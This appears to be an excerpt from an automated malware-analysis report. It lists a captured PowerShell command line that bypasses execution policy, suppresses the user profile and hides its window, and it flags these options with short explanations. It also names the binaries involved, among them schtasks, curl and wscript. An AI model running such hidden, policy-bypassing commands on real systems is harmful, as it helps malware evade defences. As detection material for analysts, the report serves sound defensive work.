-executionpolicy bypss -NoProfile -command $OWjuxD
option -executionpolicy bypass value Attempts to bypass execution policy
option -noprofile value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
option -noprofile value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
option -noprofile value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
option -executionpolicy bypass value Attempts to bypass execution policy
option -noprofile value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
option -executionpolicy bypass value Attempts to bypass execution policy
option -noprofile value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
option -noprofile value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
option -executionpolicy bypass value Attempts to bypass execution policy
option -noprofile value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
file C:\Windows\System32\schtasks.exe
file C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe
file C:\util\curl\curl.exe
file C:\Windows\SysWOW64\wscript.exe
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe